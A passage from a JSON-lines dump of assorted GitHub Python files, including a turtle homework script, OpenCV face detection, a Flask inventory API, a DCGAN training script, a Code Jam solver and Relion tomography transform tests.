= 3\r\nb = 4\r\nc = 5\r\nif a < b:\r\n print('OK')\r\nelif c < b:\r\n print('OK')\r\nelif a + b == c:\r\n print('OK')\r\nelif a**2 + b**2 == c**2:\r\n print('OK')\r\n#2\r\nelse:\r\n print('NOT OK')\r\n \r\n#3\r\nimport math\r\nimport 
turtle\r\ncolor = input(\"Pick a color: \")\r\nwidth = int(input(\"Pick a line width: \"))\r\nlength = int(input(\"Pick a line length: \"))\r\nshape = input(\"Pick a shape: \")\r\ns = turtle.Screen()\r\nt = turtle.Turtle()\r\n\r\nt.color(color)\r\nt.width(width)\r\n\r\nif shape.lower() == \"line\":\r\n t.fd(length)\r\nelif shape.lower() == \"triangle\":\r\n t.fd(length)\r\n t.left(120)\r\n t.fd(length)\r\n t.left(120)\r\n t.fd(length)\r\nelif shape.lower() == \"square\":\r\n t.fd(length)\r\n t.left(90)\r\n t.fd(length)\r\n t.left(90)\r\n t.fd(length)\r\n t.left(90)\r\n t.fd(length)\r\nelse:\r\n print(\"Invalid shape\")\r\n","repo_name":"Ozypher/PythonDump","sub_path":"PYTHON/hw3sol.py","file_name":"hw3sol.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1965008996","text":"#FACE AND EYE DETECTION USING OPENCV\r\nimport cv2\r\n#cascade classifier: detects objects of different sizes in the input image\r\n#opencv already contains many pre trained classifiers for face,eyes,liscence plate detection,smile etc.those are xmlfiles.\r\nface_cascade=cv2.CascadeClassifier('C:/Users/vedavyas/Anaconda3/Lib/site-packages/cv2/data/haarcascade_frontalface_default.xml')\r\neye_cascade=cv2.CascadeClassifier('C:/Users/vedavyas/Anaconda3/Lib/site-packages/cv2/data/haarcascade_eye.xml')\r\ndef detect(gray,frame):\r\n #syntax of detectmultiplescale is detectMultipleScale(image,rejectlevels,levelweights)\r\n faces=face_cascade.detectMultiScale(gray,1.3,5)\r\n for(x,y,w,h) in faces:\r\n cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2)\r\n roi_gray=gray[y:y+h, x:x+w]\r\n roi_color=frame[y:y+h, x:x+w]\r\n #here scale factor=1.1,min neighbours=3 it will in range[3,5].\r\n eyes=eye_cascade.detectMultiScale(roi_gray,1.1,3)\r\n for(ex,ey,ew,eh) in eyes:\r\n cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)\r\n return frame\r\n#to activate the webcamera\r\nvideo_capture=cv2.VideoCapture(0)\r\nwhile True:\r\n #capture frame by frame\r\n _,frame=video_capture.read()\r\n #our operations on the frame come here\r\n gray=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\r\n canvas=detect(gray,frame)\r\n #display the resulting frame\r\n cv2.imshow('video',canvas)\r\n #ord('q') returns the unicode point of q.cv2.waitkey(1) returns the a 32 bit integer corresponding to the pressed key\r\n #and &0xFF is the bit mask which sets the left 24 bits to zero,because ord() returns a valve between 0 and 255.therefore\r\n #once the mask is applied,it is possible to check if it is the the coresponding key.\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n#this will make the camera to close after performing the actions[when everything done,release the video capture]\r\nvideo_capture.release()\r\n#finally it will simply destroy all the windows that we have created.if u want to destroy any specific window use cv2\r\ncv2.destroyAllWindows()","repo_name":"Vedavyas17/face-and-eye-detection-using-openCV","sub_path":"face and eye detection using openCV.py","file_name":"face and eye detection using openCV.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"37660827420","text":"\nimport os\nfrom flask_cors import CORS\nfrom flask import Flask, json, request, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\nfrom models.product import Product\nfrom shema.schemaApp import ProductSchema\nfrom querysApp 
import QuerysApp\nimport psycopg2\n\n\napp = Flask(__name__)\ncors = CORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\n# db = SQLAlchemy(app) # Devuele instancia de base de datos\nglobal conn\nconn = psycopg2.connect( dbname=\"bd_inventory\", user=\"postgres\", password=\"root\", host=\"localhost\", port=\"5432\" )\napp.config['SQLALCHEMY_DATABASE_URI'] = \"postgresql://postgres:root@localhost:5432/bd_inventory\"\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app) # Devuele instancia de base de datos\ndb.create_all()\n\nproduct_schema = ProductSchema()\nproducts_schema = ProductSchema(many=True)\n\n@app.route('/add-product', methods=['POST'])\ndef createProduct():\n name = request.json['name']\n description = request.json['description']\n reference = request.json['reference']\n cant = request.json['cant']\n fech_update = request.json['fech_update']\n\n new_product = Product(None, name, description, reference, cant, fech_update)\n db.session.add(new_product)\n db.session.commit()\n return product_schema.jsonify(new_product)\n\n@app.route('/list-product', methods=['GET'])\ndef listProduct():\n all_products = QuerysApp.get_products_all()\n result = products_schema.dump(all_products)\n return jsonify(result)\n\n@app.route('/product/<id>', methods=['PUT'])\ndef product_update(id):\n name = request.json['name']\n description = request.json['description']\n reference = request.json['reference']\n cant = request.json['cant']\n fech_update = request.json['fech_update']\n\n update_product = Product(None, name, description, reference, cant, fech_update)\n cursor = conn.cursor()\n query = ''' UPDATE product SET id=%s, name=%s, description=%s, reference=%s, cant=%s, fech_update=%s WHERE id=%s'''\n cursor.execute(query, (id, name, description, reference, cant, fech_update, id))\n conn.commit()\n return product_schema.jsonify(update_product)\n\n@app.route('/delete-product/<id>', methods=['DELETE'])\ndef delete_product(id):\n print(f'El id es: {id}')\n cursor = conn.cursor()\n query = '''DELETE FROM public.product WHERE id=%s'''\n cursor.execute(query, (id,))\n # ((product_schema), each['id'])\n conn.commit()\n conn.close()\n return {'message': f'Producto con id {id} fue eliminado con exito'}\n\n\n\nif __name__ == '__main__':\n os.system('cls')\n app.run(debug=True)","repo_name":"camilo19930/store-inventory-back","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"33052787477","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\n\ndados = pd.read_excel('teste.xlsx')\nportadores = dados['NOME PORTADOR']\n\nx = 0\nfor portador in portadores:\n if (portador == 'Sigiloso'):\n x = x + 1\n\nprint(x)","repo_name":"araulima/teste_de_qualificacao","sub_path":"L_resp.py","file_name":"L_resp.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"23509566001","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport itertools\nimport math\n\n\nclass CoinJam( object ):\n def __init__( self, inputFile, outputFile ):\n self.inputFile = inputFile\n self.outputFile = outputFile\n self.jamCoins = []\n\n with open( inputFile, 'r' ) as i, open( outputFile, 'w+' ) as o:\n inputFileContents = i.readlines()\n numberOfCases = inputFileContents[ 0 ]\n inputFileContents[ 1 ]\n self.N, self.J = map( int, inputFileContents[ 1 ].split() )\n\n 
self.calculateJamCoins()\n self.printJamCoins( o )\n\n def calculateJamCoins( self ):\n for cartProd in itertools.product( ( '0', '1' ), repeat = self.N - 2 ):\n cartProdInnerString = ''.join( cartProd )\n cartProdString = '1' + cartProdInnerString + '1'\n baseReps = []\n for base in xrange( 2, 11 ):\n baseRep = int( cartProdString, base = base )\n baseReps.append( baseRep )\n\n nontrivialDivisors = map( CoinJam.isPrime, baseReps )\n if all( map( lambda x: x != 0, nontrivialDivisors ) ):\n self.jamCoins.append( ( cartProdString, baseReps, nontrivialDivisors ) )\n print( 'FOUND JAMCOIN #' + str( len( self.jamCoins ) ) )\n else:\n print( cartProdString + ' is not a jamcoin' )\n\n if len( self.jamCoins ) == self.J:\n return\n\n #print( cartProdString + ' : ' + str( zip( baseReps, nontrivialDivisors ) ) )\n\n @staticmethod\n def isPrime( number ):\n print( 'isPrime( ' + str( number ) + ' )' )\n if number % 2 == 0 and number > 2:\n return 2\n for i in xrange( 3, int( math.sqrt( number ) ) + 1, 2 ):\n print( str( number ) + ' / ' + str( i ) )\n if ( number % i ) == 0:\n return i\n\n return 0\n\n def printJamCoins( self, outputFile ):\n print( 'Case #1:', file = outputFile )\n for jamCoin in self.jamCoins:\n print( jamCoin[ 0 ] + ' ' + ' '.join( map( str, jamCoin[ 2 ] ) ), file = outputFile )\n #print( jamCoin[ 0 ] + ': ' + ' '.join( map( str, zip( jamCoin[ 1 ], jamCoin[ 2 ] ) ) ) )\n\n\nif __name__ == '__main__':\n #coinJam = CoinJam( 'testInput.txt', 'results.txt' )\n #coinJam = CoinJam( 'C-small-attempt0.in', 'results-small.txt' )\n #coinJam = CoinJam( 'C-large.in', 'results-large.txt' )\n coinJam = CoinJam( 'C-large.in', 'test.txt' )\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_179/3180.py","file_name":"3180.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33887373365","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import division, unicode_literals\n\nimport torch\n\nfrom onmt.utils.logging import init_logger\nfrom onmt.translate.translator import build_translator\n\nfrom onmt.opts_translate import OPT_TRANSLATE\n\n\ndef synthesis(opt, tgt_data_iter):\n torch.cuda.set_device(opt.gpu)\n translator = build_translator(opt, report_score=True)\n all_scores, all_predictions = translator.translate(src_path=opt.src,\n tgt_data_iter=tgt_data_iter,\n tgt_path=opt.tgt,\n src_dir=opt.src_dir,\n batch_size=opt.batch_size,\n attn_debug=opt.attn_debug)\n\n return all_predictions\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n opt = OPT_TRANSLATE()\n\n logger = init_logger(opt.log_file)\n # synthesis(opt,tgt_data_iter)\n","repo_name":"jkwang93/ChemistGA","sub_path":"transformer_model/get_reaction_results.py","file_name":"get_reaction_results.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"61"} +{"seq_id":"40135385320","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nfrom torch.autograd import Variable\nfrom torchvision.utils import save_image\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom IPython.display import HTML\nimport numpy as np\nfrom torch.optim.lr_scheduler import StepLR\nimport torchvision.utils as vutils\nfrom torch.utils.data import DataLoader, TensorDataset\nfrom scipy import linalg\nfrom scipy.stats 
import entropy\nimport random\nimport tqdm\n# Resize image to this size\nimage_size=64\nrandom.seed(40)\n\n# Setting up transforms to resize and normalize \ntransform=transforms.Compose([ transforms.Resize(image_size),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\n# batchsize of dataset\nbatch_size = 128\n\n# Load STL-10 Dataset\ngan_train_dataset = datasets.STL10(root='./stl10_data/', split='train', transform=transform, download=True)\ngan_train_loader = torch.utils.data.DataLoader(dataset=gan_train_dataset, batch_size=batch_size, shuffle=True)\n\n\nclass DCGAN_Generator(torch.nn.Module):\n def __init__(self):\n super(DCGAN_Generator,self).__init__()\n self.l1 = torch.nn.ConvTranspose2d(100, 1024, kernel_size=4, stride=1, padding=0, bias=False)\n self.bn1 = torch.nn.BatchNorm2d(1024)\n self.l2 = torch.nn.ConvTranspose2d(1024, 512, kernel_size=4, stride=2, padding=1, bias=False)\n self.bn2 = torch.nn.BatchNorm2d(512)\n self.l3 = torch.nn.ConvTranspose2d(512, 256, kernel_size=4, stride=2, padding=1, bias=False)\n self.bn3 = torch.nn.BatchNorm2d(256)\n self.l4 = torch.nn.ConvTranspose2d(256, 128, kernel_size=4, stride=2, padding=1, bias=False)\n self.bn4 = torch.nn.BatchNorm2d(128)\n self.l5 = torch.nn.ConvTranspose2d(128, 3, kernel_size=4, stride=2, padding=1)\n self.relu = torch.nn.ReLU()\n self.tanh = torch.nn.Tanh()\n\n self.layer = torch.nn.Sequential(self.l1, self.bn1, self.relu, self.l2, self.bn2, self.relu, self.l3, self.bn3, self.relu, self.l4, self.bn4, self.relu, self.l5, self.tanh)\n\n def forward(self, input):\n return self.layer(input)\n #return torch.tanh(self.l4(output))\n\nclass DCGAN_Discriminator(torch.nn.Module):\n def __init__(self):\n super(DCGAN_Discriminator, self).__init__()\n self.l1 = torch.nn.Conv2d(3, 128, kernel_size=4, stride=2, padding=1)\n self.l2 = torch.nn.Conv2d(128, 256, kernel_size=4, stride=2, padding=1, bias=False) \n self.bn2 = torch.nn.BatchNorm2d(256)\n self.l3 = torch.nn.Conv2d(256, 512, kernel_size=4, stride=2, padding=1, bias=False) \n self.bn3 = torch.nn.BatchNorm2d(512)\n self.l4 = torch.nn.Conv2d(512, 1024, kernel_size=4, stride=2, padding=1, bias=False)\n self.bn4 = torch.nn.BatchNorm2d(1024)\n self.l5 = torch.nn.Conv2d(1024, 1, kernel_size=4, stride=1, padding=0)\n self.sigmoid = torch.nn.Sigmoid()\n self.relu = torch.nn.LeakyReLU(negative_slope=0.2, inplace=True)\n self.layer = nn.Sequential(self.l1, self.relu, self.l2, self.bn2, self.relu, self.l3, self.bn3, self.relu , self.l4, self.bn4, self.relu, self.l5, self.sigmoid)\n\n def forward(self, input):\n return self.layer(input)\n\ntorch.autograd.set_detect_anomaly(True)\nfake = torch.load('test_case_GAN/fake.pt')\nnetD = torch.load('test_case_GAN/netD.pt')\nreal = torch.load('test_case_GAN/real.pt')\nnetG = torch.load('test_case_GAN/netG.pt')\nnoise = torch.load('test_case_GAN/noise.pt')\nValid_label = torch.load('test_case_GAN/Valid_label.pt')\nFake_label = torch.load('test_case_GAN/Fake_label.pt')\ncriterion = torch.load('test_case_GAN/criterion.pt')\n\n\ndef loss_discriminator(D, real, G, noise, Valid_label, Fake_label, criterion):\n '''\n 1. Forward real images into the discriminator\n 2. Compute loss between Valid_label and dicriminator output on real images\n 3. Forward noise into the generator to get fake images\n 4. Forward fake images to the discriminator\n 5. Compute loss between Fake_label and discriminator output on fake images\n 6. sum real loss and fake loss as the loss_D\n 7. 
we also need to output fake images generate by G(noise) for loss_generator computation\n '''\n\n real = torch.squeeze(real, 1)\n real = torch.squeeze(real, 1)\n real = torch.squeeze(real, 1)\n #print(netG)\n\n\n #print(\"real image SHAPE\", real.shape)\n d = D(real)\n #print(\"Real disc output\", d)\n real_output = torch.squeeze(d, 1)\n real_output = torch.squeeze(real_output, 1)\n real_output = torch.squeeze(real_output, 1)\n\n #print(Valid_label.shape)\n #print(real_output.shape)\n\n real_loss = criterion(Valid_label, real_output)\n\n print(\"nan in noise?\", torch.isnan(noise).any())\n fake_gen = G(noise)\n print(\"nan in output of G?\", torch.isnan(fake_gen).any())\n #print(D)\n #print(\"Generator output SHAPE\", fake_gen.shape)\n d2 = D(fake_gen)\n #print(\"Fake disc output\", d2)\n fake_output = torch.squeeze(d2, 1)\n fake_output = torch.squeeze(fake_output, 1)\n fake_output = torch.squeeze(fake_output, 1)\n\n\n fake_loss = criterion(Fake_label, fake_output)\n\n #print(real_loss, fake_loss)\n loss_D = real_loss + fake_loss\n\n return loss_D, fake_gen\n\ndef loss_generator(netD, fake, Valid_label, criterion):\n '''\n 1. Forward fake images to the discriminator\n 2. Compute loss between valid labels and discriminator output on fake images\n '''\n\n #print(fake)\n pred = netD(fake) \n #print(\"OUT\", pred)\n\n pred = torch.squeeze(pred, 1)\n pred = torch.squeeze(pred, 1)\n pred = torch.squeeze(pred, 1) \n loss_G = criterion(Valid_label, pred)\n return loss_G\n\n\n#print(netD)\n\nloss_D, fake_G = loss_discriminator(netD, real, netG, noise, Valid_label, Fake_label, criterion)\ntorch.save(loss_D, 'test_case_GAN/loss_D.pt')\nloss_G = loss_generator(netD, fake, Valid_label, criterion)\ntorch.save(loss_G, 'test_case_GAN/loss_G.pt')\n\ntest_loss_D = torch.load('test_case_GAN/loss_D.pt')\ntest_loss_G = torch.load('test_case_GAN/loss_G.pt')\n\nprint('test case loss_D:', test_loss_D.item())\nprint('computed loss_D:', loss_D.item())\n\nprint('test case loss_G:', test_loss_G.item())\nprint('computed loss_G:', loss_G.item())\n\n\n\nimport torchvision.utils as vutils\nfrom torch.optim.lr_scheduler import StepLR\nimport pdb\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n# Number of channels\nnc = 3\n# Size of z latent vector (i.e. 
size of generator input)\nnz = 100\n# Size of feature maps in generator\nngf = 128\n# Size of feature maps in discriminator\nndf = 128\n\n\n# custom weights initialization called on netG and netD\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n nn.init.constant_(m.bias.data, 0)\n\n# Create the generator and discriminator\nnetG = DCGAN_Generator().to(device)\nnetD = DCGAN_Discriminator().to(device)\n\n# Apply weight initialization\nnetG.apply(weights_init)\nnetD.apply(weights_init)\n\n\n# Initialize BCELoss function\ncriterion = nn.BCELoss()\n\n# Create latent vector to test the generator performance\nfixed_noise = torch.randn(36, nz, 1, 1, device=device)\n\n# Establish convention for real and fake labels during training\nreal_label = 1\nfake_label = 0\n\nlearning_rate = 0.0002\nbeta1 = 0.5\n\n# Setup Adam optimizers for both G and D\noptimizerD = optim.Adam(netD.parameters(), lr=learning_rate, betas=(beta1, 0.999))\noptimizerG = optim.Adam(netG.parameters(), lr=learning_rate, betas=(beta1, 0.999))\n\nimg_list = []\nreal_img_list = []\nG_losses = []\nD_losses = []\niters = 0\nnum_epochs = 100\n\n \ndef load_param(num_eps):\n model_saved = torch.load('/content/gan_{}.pt'.format(num_eps))\n netG.load_state_dict(model_saved['netG'])\n netD.load_state_dict(model_saved['netD'])\n\n# GAN Training Loop\nfor epoch in range(num_epochs):\n for i, data in enumerate(gan_train_loader, 0):\n real = data[0].to(device)\n b_size = real.size(0)\n noise = torch.randn(b_size, nz, 1, 1, device=device)\n\n Valid_label = torch.full((b_size,), real_label, dtype=torch.float, device=device)\n Fake_label = torch.full((b_size,), fake_label, dtype=torch.float, device=device)\n ############################\n # (1) Update D network: maximize log(D(x)) + log(1 - D(G(z)))\n ###########################\n\n netD.zero_grad()\n torch.nn.utils.clip_grad_norm_(netD.parameters(), 1)\n\n # Function to compute discriminator loss\n loss_D, fake = loss_discriminator(netD, real, netG, noise, Valid_label, Fake_label, criterion)\n\n\n # torch.save(fake,'test_case_GAN/fake.pt')\n # torch.save(netD,'test_case_GAN/netD.pt')\n # torch.save(real,'test_case_GAN/real.pt')\n # torch.save(netG,'test_case_GAN/netG.pt')\n # torch.save(noise,'test_case_GAN/noise.pt')\n # torch.save(Valid_label,'test_case_GAN/Valid_label.pt')\n # torch.save(Fake_label,'test_case_GAN/Fake_label.pt')\n # torch.save(criterion,'test_case_GAN/criterion.pt')\n\n # pdb.set_trace()\n loss_D.backward(retain_graph=True)\n # Update D\n\n for name, param in netD.named_parameters():\n print(name, param.grad)\n print(name, torch.isfinite(param.grad).all())\n \n optimizerD.step() \n\n ############################\n # (2) Update G network: maximize log(D(G(z)))\n ###########################\n netG.zero_grad()\n # Function to compute generator loss\n\n loss_G = loss_generator(netD, fake, Valid_label, criterion)\n # Calculate gradients for G\n loss_G.backward()\n # Update G\n\n torch.nn.utils.clip_grad_norm_(netG.parameters(), 1)\n optimizerG.step() \n\n # Output training stats\n if i % 50 == 0:\n print('[%d/%d][%d/%d]\\tLoss_D: %.4f\\tLoss_G: %.4f\\t'\n % (epoch, num_epochs, i, len(gan_train_loader),\n loss_D.item(), loss_G.item()))\n\n # Save Losses for plotting later\n G_losses.append(loss_G.item())\n D_losses.append(loss_D.item())\n\n # Check how the generator is doing by saving G's output on fixed_noise\n 
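# --- Editor's note on the loss computation above (not part of the original record) ---
# torch.nn.BCELoss is called as criterion(input, target): the model output goes
# first and the label tensor second. loss_discriminator and loss_generator above
# pass criterion(Valid_label, real_output) etc., i.e. with the arguments swapped,
# which puts log() on the hard 0/1 labels and is a plausible source of the NaNs
# this script keeps checking for. The corrected calls would read:
#
# real_loss = criterion(real_output, Valid_label)
# fake_loss = criterion(fake_output, Fake_label)
# loss_G = criterion(pred, Valid_label)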
if (iters % 500 == 0) or ((epoch == num_epochs-1) and (i == len(gan_train_loader)-1)):\n with torch.no_grad():\n fake = netG(fixed_noise).detach().cpu()\n img_list.append(vutils.make_grid(fake, padding=2, normalize=True))\n\n iters += 1\n\n \n\nplt.title(\"Generator and Discriminator Loss During Training\")\nplt.plot(G_losses,label=\"G\")\nplt.plot(D_losses,label=\"D\")\nplt.xlabel(\"iterations\")\nplt.ylabel(\"Loss\")\nplt.legend()\nplt.show()\n\ncheckpoint = {'netG': netG.state_dict(),\n 'netD': netD.state_dict()}\ntorch.save(checkpoint, 'content/gan_{}.pt'.format(num_epochs))\n","repo_name":"ajyanand/GeneralAdverserialNetworks","sub_path":"GAN.py","file_name":"GAN.py","file_ext":"py","file_size_in_byte":10960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13330802249","text":"from Distance_Grid import Distance_Grid\nfrom Binary_tree import BinaryTree\nfrom Cell import Cell\n\n\n\ngrid = Distance_Grid(5, 5)\nBinaryTree.on(grid)\n\n\nstart = grid.plane_grid[0][0]\ndistance = start.distances()\ngrid.set_distance(distance)\n\nprint(str(grid))\n\nimg = grid.to_png()\nimg.save(\"maze.png\")\n\ngrid.distances = distance.path_to(grid.plane_grid[grid.rows - 1][0])\n\nprint(str(grid))\n\n\n\n","repo_name":"lorcanj/Maze","sub_path":"dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40708581220","text":"from windrose import WindroseAxes\nfrom matplotlib import pyplot as plt\nimport matplotlib.cm as cm\nimport numpy as np\nimport parameter\nimport pandas as pd\n\n### getting parameter\nparameter = parameter.SiteInfo()\nsiteName = parameter.name\nreturnPeriod = parameter.returnPeriod()\n\n### read data\ninputFileName = siteName+str(returnPeriod)+\"YearsVmax.csv\"\ndataset = pd.read_csv(inputFileName,header=None,sep=' ')\ndataset = np.array(dataset)\nm ,n = np.shape(dataset)\nSpd = dataset[:,0] \nDir = dataset[:,1]\n \nfig = plt.gcf() \nax = WindroseAxes.from_ax()\nax.bar(Dir, Spd, normed=True, opening=0.8, edgecolor='white')\nax.set_legend()\n \nplt.show()\nfigName = siteName+str(returnPeriod)+\"YearsWindRose.png\" \nfig.savefig(figName)\nplt.close()\n","repo_name":"islandowner95/typhoon-risk-all","sub_path":"typhoonRiskV2p0/plotWindRose.py","file_name":"plotWindRose.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70562348675","text":"# coding=utf-8\n\nimport pandas as pd\nimport numpy as np\n\n\na1 = [1, 2, 3, 4]\na2 = ['a', 'b', 'c', 'd']\na3 = pd.Series(data=a1, index=a2, name='chen')\n# index 是索引列\n# data 是数据列 date和index 长度必须相同\nprint(a3)\n\nprint(a3.index) # 取出索引列\nprint(a3.name) # Series对象的名字\nprint(a3.values) # 取出数据列\nprint(a3.dtype) # 元素类型\n\n\n# index 要么不提供,要么提供的时候必须和data长度一致\na5 = np.array([1, 2, 4, 4]) # 创建一个简单的相当于py中的list\na4 = pd.Series(data=a5)\n\nprint(a4)\n\n\n\n# 如果传的数据是已经自带索引了 就不需要再传递索引 比如字典,或者已经建立的Series\na6 = {\"a\": 1, \"b\": 2, \"c\": 3, 'd': 44}\na7 = pd.Series(data=[1,2,3,5,5], index=['z1', 'z2', 'z3', 'z4', 'z1'])\nf4 = [11, 22, 33, 44, 55]\n# q1 = pd.Series(data=a7, index=f4)\nq2 = pd.Series(data=a6, index=f4)\nprint(q2)\n\n\ndata = [\n [1, 2, 3],\n [\"aaaa\", 5, 6]\n]\n\nindex = ['a', 'b']\ncolumns = ['c', 'd', 'e']\np = pd.DataFrame(index=index, data=data, 
columns=columns)\nprint(p)\n\n\n","repo_name":"coopergoon/jupyter","sub_path":"pd/pd_demo1.py","file_name":"pd_demo1.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19006312193","text":"# *\n# * Authors: Scipion Team\n# *\n# * Unidad de Bioinformatica of Centro Nacional de Biotecnologia , CSIC\n# *\n# * This program is free software; you can redistribute it and/or modify\n# * it under the terms of the GNU General Public License as published by\n# * the Free Software Foundation; either version 2 of the License, or\n# * (at your option) any later version.\n# *\n# * This program is distributed in the hope that it will be useful,\n# * but WITHOUT ANY WARRANTY; without even the implied warranty of\n# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# * GNU General Public License for more details.\n# *\n# * You should have received a copy of the GNU General Public License\n# * along with this program; if not, write to the Free Software\n# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA\n# * 02111-1307 USA\n# *\n# * All comments concerning this program package may be sent to the\n# * e-mail address 'scipion-users@lists.sourceforge.net'\n# *\n# **************************************************************************\nfrom reliontomo.convert.convertBase import getTransformInfoFromCoordOrSubtomo, genTransformMatrix\nfrom pyworkflow.tests import BaseTest\nfrom pwem.objects import Transform\nfrom pwem.convert.transformations import euler_matrix\nimport numpy as np\nfrom reliontomo.objects import RelionPSubtomogram\n\n\nclass TestTransformationConversion(BaseTest):\n\n\n def test_transformations(self):\n \"\"\"Test conversion o alignment information from and to relion\"\"\"\n self._test_set_transformations()\n\n def getInitialValues(self):\n \"\"\" Returns initial values, Use commented code to test a specific case\"\"\"\n fromRealCase =\"3.290925 -1.08901 40.351380 65.410000 175.090000 18.310000\"\n fromRealCase = fromRealCase.split()\n return float(fromRealCase[0]), float(fromRealCase[1]), float(fromRealCase[2]), \\\n float(fromRealCase[3]), float(fromRealCase[4]), float(fromRealCase[5]),\n def _test_set_transformations(self):\n\n\n xShift ,yShift ,zShift, rot, tilt, psi =self.getInitialValues()\n\n self._test_single_conversion(psi, rot, tilt, 0, 0, 0, \"ONLY ANGLES\")\n self._test_single_conversion(0, 0, 0, xShift, yShift, zShift, \"ONLY SHIFTS\")\n self._test_single_conversion(psi, rot, tilt, xShift, yShift, zShift, \"COMPLETE\")\n\n def _test_single_conversion(self, psi, rot, tilt, xShift, yShift, zShift, testName):\n\n self._test_direct_conversion(psi, rot, tilt, xShift, yShift, zShift, testName)\n\n rotRad = np.deg2rad(rot)\n titlRad = np.deg2rad(tilt)\n psiRad = np.deg2rad(psi)\n alignmentMatrix = euler_matrix(rotRad, titlRad, psiRad, axes=\"szyz\")\n alignmentMatrix[0, 3] = xShift\n alignmentMatrix[1, 3] = yShift\n alignmentMatrix[2, 3] = zShift\n # Convert to relion\n # We need a faked subtomogram or coordinate\n subtomo = RelionPSubtomogram()\n t = Transform(matrix=alignmentMatrix)\n subtomo.setTransform(t)\n rlnAngles, rlnShifts = getTransformInfoFromCoordOrSubtomo(subtomo, samplingRate=2)\n returningMatrix = genTransformMatrix(rlnShifts[0], rlnShifts[1], rlnShifts[2],\n rlnAngles[0], rlnAngles[1], rlnAngles[2], 2)\n\n ok = np.allclose(alignmentMatrix, returningMatrix)\n\n if not ok:\n print(\"*******\", testName, \"*******\")\n print(\"EXPECTED MATRIX:\\n 
%s\" % np.array_str(alignmentMatrix, precision=2, suppress_small=True))\n print(\"RESULT MATRIX:\\n %s\" % np.array_str(returningMatrix, precision=2, suppress_small=True))\n\n self.assertTrue(ok, \"Relion-Scipion transformations %s is wrong.\" % (testName))\n\n\n def _test_direct_conversion(self, psi, rot, tilt, xShift, yShift, zShift, testName):\n\n # Matrix for scipion\n alignmentMatrix = genTransformMatrix(xShift, yShift, zShift, rot, tilt, psi, 1.35)\n\n subtomo = RelionPSubtomogram()\n t = Transform(matrix=alignmentMatrix)\n subtomo.setTransform(t)\n\n # From scipion to relion\n rlnAngles, rlnShifts = getTransformInfoFromCoordOrSubtomo(subtomo, samplingRate=1.35)\n\n self.assertAlmostEqual(rlnAngles[0], rot, places=2,msg=\"Rot not expected for direct %s\" % testName)\n self.assertAlmostEqual(rlnAngles[1], tilt, places=2,msg=\"Tilt not expected for direct %s\" % testName)\n self.assertAlmostEqual(rlnAngles[2], psi, places=2,msg=\"Psi not expected for direct %s\" % testName)\n\n self.assertAlmostEqual(rlnShifts[0], xShift, places=2,msg=\"xShift not expected for direct %s\" % testName)\n self.assertAlmostEqual(rlnShifts[1], yShift, places=2,msg=\"yShift not expected for direct %s\" % testName)\n self.assertAlmostEqual(rlnShifts[2], zShift, places=2,msg=\"zShift not expected for direct %s\" % testName)\n\n print(\"This conversion worked both sides.\")\n print(\"Relion values: %s, %s, %s %s, %s, %s\" % (xShift, yShift, zShift, rot, tilt, psi))\n print(\"Scipion transformation matrix:\\n%s\\n\\n\" % np.array_str(alignmentMatrix, precision=2, suppress_small=True))\n\n\n\n\n","repo_name":"scipion-em/scipion-em-reliontomo","sub_path":"reliontomo/tests/test_conversion.py","file_name":"test_conversion.py","file_ext":"py","file_size_in_byte":5126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74619857475","text":"#392. is Subsequence\n#Difficulty: Easy\n\n'''\nGiven two strings s and t, return true if s is a subsequence of t, or false otherwise.\n\nA subsequence of a string is a new string that is formed from the original string by deleting some (can be none) \nof the characters without disturbing 